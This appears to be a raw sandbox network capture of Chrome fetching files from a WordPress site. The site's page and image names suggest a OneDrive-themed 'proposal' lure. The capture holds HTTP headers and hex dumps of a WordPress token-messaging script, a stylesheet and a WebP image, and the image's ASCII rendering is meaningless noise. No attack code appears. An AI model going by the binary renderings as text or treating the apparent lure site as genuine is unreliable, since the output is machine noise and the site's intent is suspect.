                                                                                                                                                                                                                                                Data Ascii: (function(){var t;var e;var n;var o=[];var i=[];var r=false;var a="jetpack:wpcomRLT";function c(t){if(!Array.isArray(n)){return false}return n.includes(t)}function s(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"r
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 28 7b 74 79 70 65 3a 22 6c 6f 67 69 6e 4d 65 73 73 61 67 65 22 2c 64 61 74 61 3a 7b 65 76 65 6e 74 3a 22 6c 6f 67 69 6e 22 2c 73 75 63 63 65 73 73 3a 74 72 75 65 2c 74 79 70 65 3a 22 72 6c 74 22 2c 74 6f 6b 65 6e 3a 74 2c 73 6f 75 72 63 65 4f 72 69 67 69 6e 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 7d 7d 29 2c 6e 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 49 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 74 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 47 65 74 54 6f 6b 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 41 64 64 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65
                                                                                                                                                                                                                                                Data Ascii: ({type:"loginMessage",data:{event:"login",success:true,type:"rlt",token:t,sourceOrigin:window.location.origin}}),n)}catch(t){return}}};window.rltIsAuthenticated=function(){return!!t};window.rltGetToken=function(){return t};window.rltAddInitializationListe
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC223INData Raw: 65 67 69 73 74 65 72 22 29 7b 69 66 28 63 28 6e 2e 6f 72 69 67 69 6e 29 29 7b 6f 2e 70 75 73 68 28 5b 6e 2e 6f 72 69 67 69 6e 2c 6e 2e 73 6f 75 72 63 65 5d 29 3b 69 66 28 74 29 7b 72 6c 74 49 6e 6a 65 63 74 54 6f 6b 65 6e 28 74 2c 6e 2e 73 6f 75 72 63 65 2c 6e 2e 6f 72 69 67 69 6e 29 7d 7d 7d 7d 7d 29 3b 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 74 29 7d 29 3b 69 3d 5b 5d 3b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 74 79 70 65 3a 22 72 6c 74 4d 65 73 73 61 67 65 22 2c 64 61 74 61 3a 7b 65 76 65 6e 74 3a 22 72 65 67 69 73 74 65 72 22 7d 7d 2c 22 2a 22 29 3b 72 3d 74 72 75 65 7d 7d 29 28 29 3b
                                                                                                                                                                                                                                                Data Ascii: egister"){if(c(n.origin)){o.push([n.origin,n.source]);if(t){rltInjectToken(t,n.source,n.origin)}}}}});i.forEach(function(e){e(t)});i=[];window.parent.postMessage({type:"rltMessage",data:{event:"register"}},"*");r=true}})();


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.1149745192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC657OUTGET /wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                Content-Length: 311
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/471-1684465074401.1533
                                                                                                                                                                                                                                                Expires: Fri, 30 May 2025 20:23:10 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC311INData Raw: 69 6d 67 2e 6c 61 74 65 78 7b 62 6f 72 64 65 72 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 76 69 64 65 6f 2d 70 6c 61 79 65 72 7b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 31 30 30 30 65 6d 7d 2e 63 6f 6d 6d 65 6e 74 20 6f 62 6a 65 63 74 2c 2e 63 6f 6d 6d 65 6e 74 20 65 6d 62 65 64 2c 2e 65 6d 62 65 64 2d 76 69 6d 65 6f 20 69 66 72 61 6d 65 2c 2e 65 6d 62 65 64 2d 79 6f 75 74
                                                                                                                                                                                                                                                Data Ascii: img.latex{border:0;vertical-align:middle}.video-player{border:0;margin:auto;padding:5px;text-align:center;max-width:100%}.hidden{display:none}.screen-reader-text{position:absolute;left:-1000em}.comment object,.comment embed,.embed-vimeo iframe,.embed-yout


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.1149734192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC702OUTGET /wp-content/uploads/2024/12/onedrive-for-business.webp HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:33 GMT
                                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                                Content-Length: 44420
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 20 Dec 2024 13:11:18 GMT
                                                                                                                                                                                                                                                Expires: Sun, 19 Jan 2025 20:32:48 GMT
                                                                                                                                                                                                                                                X-Orig-Src: 01_mogdir
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca HIT
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1002INData Raw: 52 49 46 46 7c ad 00 00 57 45 42 50 56 50 38 4c 70 ad 00 00 2f 1f 03 56 00 11 48 6e 1b 49 92 20 45 f4 cc 14 9c fd ff 07 67 d4 32 db 3d a2 ff 13 c0 ff fe 39 d4 d4 fd 13 92 a0 ab d3 2c 8c 0b bf cd 84 d6 15 b3 6b ea db f6 b5 58 09 59 09 3f 37 26 ea 0a d4 49 bc 14 ef b9 32 5f 70 73 c8 25 cf 9e ac 48 f7 56 05 74 43 43 75 43 81 3e 50 1b fd 01 35 bc 03 1f a0 8c dd 0d 55 97 dc 81 90 63 3a d8 cf f8 10 68 88 53 1d 17 d6 71 e4 11 36 b0 7b a8 aa 0b 46 05 e3 96 dc f2 03 c8 15 03 c9 c6 ad 64 48 36 89 23 e8 05 07 7e 08 08 9e 78 07 85 24 d5 21 d9 c8 85 e8 a6 9b 3a e5 44 93 68 8b 83 c9 a1 66 14 92 4c 2a b8 67 78 1f 27 49 8e a0 c3 a9 c2 3b 4a 82 0a 24 a1 18 87 03 8a 89 2d 86 7c 54 48 c2 b8 3d 5c c5 5c dc cd 44 b2 6a 6d 8a 24 5d 7e 82 92 20 f8 f9 29 ec 27 28 69 5b f7 fb 3f
                                                                                                                                                                                                                                                Data Ascii: RIFF|WEBPVP8Lp/VHnI Eg2=9,kXY?7&I2_ps%HVtCCuC>P5Uc:hSq6{FdH6#~x$!:DhfL*gx'I;J$-|TH=\\Djm$]~ )'(i[?
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: e4 36 6d bb 6b b9 71 a4 b5 f6 3e e7 a4 85 4b 00 04 59 4e 5e ed c6 cf 47 6f 7f c7 fc 82 f9 38 bf c5 7f 9a d0 b7 b1 9f e4 bd f7 b6 1c 49 b0 40 12 84 47 fa 3c 7e ef b5 3e 00 48 ec b3 f7 da 87 00 c6 3d 0d 95 a8 0a 0e ab 64 50 bb 77 9f 31 4b 55 d1 94 63 e5 30 08 65 2f cd 19 f5 51 3b 6a 62 aa 4f 4d 2a 1b b1 2b 38 55 68 4f d9 9c a3 9c 9a d8 72 18 57 9d 53 62 4e 76 36 64 ce 98 1a 2a a6 28 0c 5a e8 8c 1d c4 44 63 1c a7 a2 0a 8d e8 ac 2c f2 4c cb 4b 65 9a 22 83 3a 91 32 d9 56 5e a2 c4 41 65 31 c2 af 40 49 8a 6c db b6 d5 cc 3c b2 3a 2d e6 25 ad b5 19 a4 2d f2 fe cf ad ed ff d8 22 69 cc cc 30 19 c6 1c a3 8f de ab 32 cc 3c 49 92 e4 c8 b6 6d 5b 22 6a 31 c6 44 07 96 60 ab 36 28 1f 3a cd 41 6d c4 b0 b6 f0 5a 63 8c cc 70 d3 98 00 6e cc b6 bd 92 dc 48 fa be ef 9c 30 19 99
                                                                                                                                                                                                                                                Data Ascii: 6mkq>KYN^Go8I@G<~>H=dPw1KUc0e/Q;jbOM*+8UhOrWSbNv6d*(ZDc,LKe":2V^Ae1@Il<:-%-"i02<Im["j1D`6(:AmZcpnH0
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: a4 63 e2 a9 94 9d 8c be d6 bb ae e7 5e bd b7 5d 6c 94 2d 96 07 89 72 d3 af 9d bd 55 47 69 74 36 a0 4f 08 77 d4 b8 d8 38 65 01 d2 20 b1 34 43 cd 55 c4 20 88 c6 72 85 98 b5 21 07 b6 be 71 f7 ef 5f 7f 7d 7f 6b 91 86 3d 62 fb a8 f8 7f 9e e2 0a a1 5d c8 ad d3 ff e7 92 57 04 f9 42 be fb d4 a9 7c ab eb 25 48 b2 0f 00 84 12 49 e5 19 c6 d5 7a ed 25 b6 37 cd 82 02 e2 fa d3 5c 10 7a 11 7e 66 3a 1a db 9b a7 4a 09 24 c0 95 50 37 df 6f f5 53 99 70 cc db f2 f8 5f e0 5a 3c da 65 42 20 36 ff fe 98 b0 b9 5d fb 0b 7a 8f 4f 6f d7 e6 22 ec 80 da e9 03 f8 c5 8f d2 2f 7e b8 be bc 55 9a 7b b8 5d a3 0d a0 2a f7 b0 e0 86 53 3b 1b 91 62 f2 95 4a bd 73 d3 af 12 12 80 81 18 fc 64 9d 6f 0b ac 67 37 b7 c5 b5 b4 ee c1 5b f4 4f 34 25 da f6 8c fe c9 62 91 3a bc 33 75 97 57 fc 97 01 34 33
                                                                                                                                                                                                                                                Data Ascii: c^]l-rUGit6Ow8e 4CU r!q_}k=b]WB|%HIz%7\z~f:J$P7oSp_Z<eB 6]zOo"/~U{]*S;bJsdog7[O4%b:3uW43
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 20 a9 39 a6 c7 49 2f ae 34 1f 57 c9 d1 64 64 50 12 89 ba c2 1b 17 a5 b0 e3 5a b7 e5 2f ef 2a a7 09 4f d4 d4 db 3b 6e f8 96 6b 29 99 a3 6e 17 82 af 48 3c f1 84 9f 70 cd f6 0c f8 2b f8 72 cb 43 e2 5f ab 3d d6 25 47 a8 91 58 c3 c2 96 10 82 26 3f b7 ed 23 4e 0e cf 6a fa 16 97 bb 7c f9 9f 05 44 f4 d3 de b4 3f f1 0f fc c4 37 f8 e1 3f e1 b9 b7 39 b9 d6 dd 3c f3 f5 25 38 49 1f 85 7a 8f 2f 2b b4 8f 2c f3 b4 df e6 49 e6 85 5b 52 c7 76 0f 4b 24 99 43 7d 5a de fe d4 c4 79 de cb fc 6e 48 45 2b 1e 9c 14 90 68 04 1d 8c 24 4f eb c7 f5 15 7c 85 31 fb d8 36 ee e8 81 e0 14 80 13 23 76 bd 3d 94 8a 0b 51 41 48 e9 30 2b 16 b3 7c 35 b5 3c 0f ef fa be fc 99 db f3 9d c5 22 55 57 ab 3b d7 3d ad dd 23 bd aa 4f 66 c7 0f 71 8a 70 7b fb a0 65 16 0f 84 da ed 7a 9e 9b 87 99 09 40 d9 b1
                                                                                                                                                                                                                                                Data Ascii: 9I/4WddPZ/*O;nk)nH<p+rC_=%GX&?#Nj|D?7?9<%8Iz/+,I[RvK$C}ZynHE+h$O|16#v=QAH0+|5<"UW;=#Ofqp{ez@
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 56 cb fe 29 fa cb d7 0e 23 f1 97 c5 9f 79 d8 96 4b 57 b3 75 d3 5f 79 a4 bd a4 f4 f8 2c c2 44 e4 91 28 9c d8 0e 50 02 7f 4e a0 bb 7b 57 f8 3e 74 5c 5e e3 f3 57 8c 0b f7 2a e5 78 e1 5f 87 97 24 f1 a2 3f d7 55 88 c7 1c 74 dd e8 8b 04 80 3b fb fc 01 d7 64 8d 9f 54 db 72 bb d9 17 f1 19 fc 65 24 9e 67 7c c8 9b 5e 78 ea 11 4b 55 d1 ef 0f 79 e5 0f 57 1c 38 2a f4 a1 6f fe fc a9 db 12 dd 51 e2 f1 46 ab a8 80 f8 56 4f d4 ca 5d c6 f5 0e fc ae 9a 57 54 01 d8 71 5e db 17 9a d7 16 58 1d ee f6 3d 9f 96 9d 4e 29 05 7f 3c 22 51 10 8a 2a ff ca 94 95 6c 8a 57 87 8f 5a c9 d2 4b 0b 77 3c a2 c4 96 35 e5 c6 71 8b ef c2 4e 62 2f 52 be b6 91 4c 63 d6 88 ff 15 00 f6 81 05 3b aa 38 3a c2 cd 7e dd c8 b5 03 24 79 9d 9c 8a 35 51 2d ef 82 83 64 9d 9c 9b 96 92 30 f3 6c f8 47 d1 64 1e c4
                                                                                                                                                                                                                                                Data Ascii: V)#yKWu_y,D(PN{W>t\^W*x_$?Ut;dTre$g|^xKUyW8*oQFVO]WTq^X=N)<"Q*lWZKw<5qNb/RLc;8:~$y5Q-d0lGd
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: e3 36 a3 1f 5c 4e 06 b0 b4 d8 aa 6b 0d 89 43 03 c2 e0 57 fa 65 32 8e d1 8c 1b d9 92 4b c4 53 d5 e3 2f 1d 12 99 2e 6d b5 95 d7 66 ac 61 f1 6e be d2 48 0e 3b 8a aa a1 2e 70 41 7d aa 17 c8 29 5a 7c cf 0c 1f dc 5f c1 ce d0 e8 52 db af f0 f1 9d 44 8a 5d 26 9e 44 83 c0 e6 7e 83 c3 dc fe a6 4f 34 93 99 9c c9 25 97 48 47 0c 9e 2a fe 2b 2a c7 a6 fb ee 79 56 b9 13 a5 de 45 dd 88 a5 b7 ca 8e ee 13 a3 dd 73 4c 2d d3 f5 d6 d2 91 3f 4f 43 ed bc 21 9a da d2 44 c5 78 f9 f4 fc ea c1 2f ff 28 96 9c 4d 0a 02 a8 0d 1c 1a d8 53 40 d2 3f b7 7a 8f 1d 10 e6 e0 90 0d 9a 93 79 00 28 a2 49 2c 78 60 3c ab 21 c9 6d 85 b7 06 c3 bc 92 a7 f5 2c f9 c4 d4 3c e7 8f ea 8a dc 26 4c f6 c8 dc 93 1e 7d 4c 7b fc 96 ae 2a 24 ac 2d e6 04 63 c8 ff 00 19 bc 3f 9c 80 bc 63 34 ca 37 cf 3b b8 91 81 bb
                                                                                                                                                                                                                                                Data Ascii: 6\NkCWe2KS/.mfanH;.pA})Z|_RD]&D~O4%HG*+*yVEsL-?OC!Dx/(MS@?zy(I,x`<!m,<&L}L{*$-c?c47;
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 94 b1 cb 53 fd 21 bf 76 20 33 af 86 3f 60 e4 8b a6 cf 34 a9 c4 5b cf e7 3d 36 9e cd 5c d5 4e 5a 33 70 19 70 11 94 e7 9a e6 fa 98 97 db 68 70 f7 37 35 10 28 01 09 3c ac a3 ac 3f f5 cf fe 2b 9e 00 00 82 2e a5 51 cc 17 f3 e9 5b 3f 08 29 96 06 f3 da b5 e8 bd 4d 7b 60 24 4b a4 34 29 e8 6a 12 b3 1a 5e 92 34 3f af c1 e9 a6 5d 4c 48 d2 17 fa 24 7b 55 71 44 b0 d9 15 93 77 bc ee 3f e5 e3 5f f7 d9 8e c6 e5 a4 4a 97 2a 85 45 0d cc 0f cf 46 cd 5b a2 d1 e3 d7 c8 15 07 80 e0 01 0f fd c1 e7 4f fe 75 c7 e0 ff 57 5a 4e 1d 02 86 22 b5 b6 de d2 fd 6e f8 c4 d7 fa 80 0f f0 f1 fa 8b 95 c3 3b 96 d4 29 10 33 2e 97 38 a9 43 40 8d 78 ac b3 9f 75 db c6 70 0f 53 a5 a5 4e e9 8d 79 92 24 a4 cc 33 a5 cc 6d 88 07 82 e5 ae 6d 18 e5 f8 1d 3f 9f 3d 3e 09 24 4b 82 82 e3 98 49 99 c2 e5 90 88
                                                                                                                                                                                                                                                Data Ascii: S!v 3?`4[=6\NZ3pphp75(<?+.Q[?)M{`$K4)j^4?]LH${UqDw?_J*EF[OuWZN"n;)3.8C@xupSNy$3mm?=>$KI
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 32 e6 bd 7f 70 7f f6 6f 6c 81 fd bb 77 f8 fe af b0 22 36 97 8e 33 19 4d aa f7 b8 6e 2c 64 78 3e d6 8d 6d 7b df f1 a6 4f 7c 81 9e cd 3c ba 69 11 f5 dc 92 67 27 19 79 2e 99 f5 67 7e e6 67 fa 40 c6 5c 2f fc e8 97 7f fc 84 57 fc cc 7b 86 56 c8 6a 13 a2 16 4f 55 89 5d a9 32 0d 3c 89 a9 a6 c9 34 04 e0 4a 91 4f 4c 5f 7e b9 74 af f6 a9 b7 3f 6b 2f ee 2f fc 2b 32 06 6e 57 59 18 2b 64 af 86 95 17 a6 8c 93 1c 82 72 59 80 f6 ef 8c 76 18 75 7c 5a 06 3d fb dd 64 ce 8a da a5 91 73 40 b1 0f 32 0e 28 20 fe 2c 11 9b da fa 97 5f ce 8b 1c f8 20 57 0a 9e 7a 0c 51 43 48 b7 76 0d 89 26 5e 84 4a b1 61 fa 17 76 92 c7 43 bb b0 38 d6 fc 58 e9 1e 3c bb 53 7c 70 67 7f 7a 4f 9e 3e 1e 66 83 0e 09 02 70 ac 30 42 e5 d9 97 0b a9 68 99 7c 18 5e 24 94 5a 57 cb ec 0c 49 25 d6 25 30 6a e2 8d
                                                                                                                                                                                                                                                Data Ascii: 2polw"63Mn,dx>m{O|<ig'y.g~g@\/W{VjOU]2<4JOL_~t?k//+2nWY+drYvu|Z=ds@2( ,_ WzQCHv&^JavC8X<S|pgzO>fp0Bh|^$ZWI%%0j
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: f3 eb 89 08 86 78 99 fc 60 7d f0 51 ae db 19 23 5f f9 27 39 fa ef 13 5b 29 b6 20 72 48 e0 22 ad 67 14 f6 13 8c a2 30 d4 ef 62 13 a4 70 90 0b 80 61 a8 21 bd 95 8b b1 87 45 75 03 c0 7c e3 21 fa 23 be f9 55 1d c7 2d e0 d6 fa f1 2c 99 aa 20 4b f0 75 f1 5d 5f fa f1 b6 43 b9 fb d9 b0 93 87 c4 f3 76 80 42 66 27 b5 b1 dd 6e ef fa 01 fa 12 b8 a6 81 24 85 c9 35 74 63 e6 81 f6 81 d7 a3 5b 51 a5 1e cd 89 7d ce 8c b2 92 6b 8f 7e 4f eb e9 4f 24 4e 6a 0f fb 27 d7 ad ad 92 bd 3e 43 ef f1 6d 72 77 00 25 d4 8d 2d b7 bf e9 23 1f 85 b8 24 68 07 28 25 75 ad 5a bb ba cb 63 fe ac e7 ea 01 c0 87 df 95 d2 e1 61 1b 55 76 e5 e1 08 a8 17 93 c2 00 9e 12 3a 6a 43 4a e9 9d 87 7d 6f 7b 35 c1 05 c8 ad e4 56 d3 de af 79 79 54 73 86 b6 ef f7 de ff e2 a6 11 34 1a ef f7 ba 4f 23 8d bd 83 1f
                                                                                                                                                                                                                                                Data Ascii: x`}Q#_'9[) rH"g0bpa!Eu|!#U-, Ku]_CvBf'n$5tc[Q}k~OO$Nj'>Cmrw%-#$h(%uZcaUv:jCJ}o{5VyyTs4O#
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 2b 75 ef 77 7c f4 f1 bf f1 c5 4e 75 73 f7 c3 bb 78 78 e9 8e 3e eb d5 3f f2 1b 1d c9 a2 a3 5e 49 a5 79 32 ab be 9d 5e 6f 17 85 24 2d 89 f6 d6 e1 e1 fd ac 0e 80 b6 76 21 3a 7b 72 d7 cf fb b9 6b a1 76 b8 f8 60 ea 59 51 07 1a a1 e6 14 56 c2 f6 8f 95 ae e7 de 64 eb 8f 23 70 31 4a eb a4 98 ea 20 da 04 44 3b 29 a5 97 41 9b 81 24 97 dc 3f a7 f0 db ec 89 37 98 84 32 41 c3 6b 84 c9 e5 30 01 28 c0 4c 84 18 d8 b0 4a f4 0f 98 af 3c 12 56 e3 77 32 b5 ee ea 69 bf ed 87 fc f0 4f fb f2 f1 b2 b3 db 7e af ae 9b 7f 47 3a d0 f1 be 2a 55 5f b0 4b 9d 0b 29 35 c4 e1 f8 fe 7c b0 b8 99 d1 d9 be eb 41 7d ce cb 3f fa 13 ed 00 0d 1d 96 74 af f2 ed 86 36 5a 37 3e 72 f3 d3 6e 2f 03 99 d3 1c e8 8c 3f 1c 7d 5f 07 d1 a6 a8 cb 62 d1 d0 bc b6 6b 5c 49 68 03 73 df 5b 33 f9 bd 65 fa cd 5b 3c
                                                                                                                                                                                                                                                Data Ascii: +uw|Nusxx>?^Iy2^o$-v!:{rkv`YQVd#p1J D;)A$?72Ak0(LJ<Vw2iO~G:*U_K)5|A}?t6Z7>rn/?}_bk\Ihs[3e[<


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.1149751192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC373OUTGET /wp-content/js/rlt-proxy.js?m=1720530689i HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC480INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 2481
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/5444-1720530699594.9683
                                                                                                                                                                                                                                                Expires: Mon, 20 Oct 2025 02:02:58 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _bur MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC889INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 76 61 72 20 65 3b 76 61 72 20 6e 3b 76 61 72 20 6f 3d 5b 5d 3b 76 61 72 20 69 3d 5b 5d 3b 76 61 72 20 72 3d 66 61 6c 73 65 3b 76 61 72 20 61 3d 22 6a 65 74 70 61 63 6b 3a 77 70 63 6f 6d 52 4c 54 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 74 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 72 65 74 75 72 6e 20 6e 2e 69 6e 63 6c 75 64 65 73 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 69 66 28 65 26 26 74 79 70 65 6f 66 20 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 72 79 7b 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 74 79 70 65 3a 22 72
                                                                                                                                                                                                                                                Data Ascii: (function(){var t;var e;var n;var o=[];var i=[];var r=false;var a="jetpack:wpcomRLT";function c(t){if(!Array.isArray(n)){return false}return n.includes(t)}function s(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"r
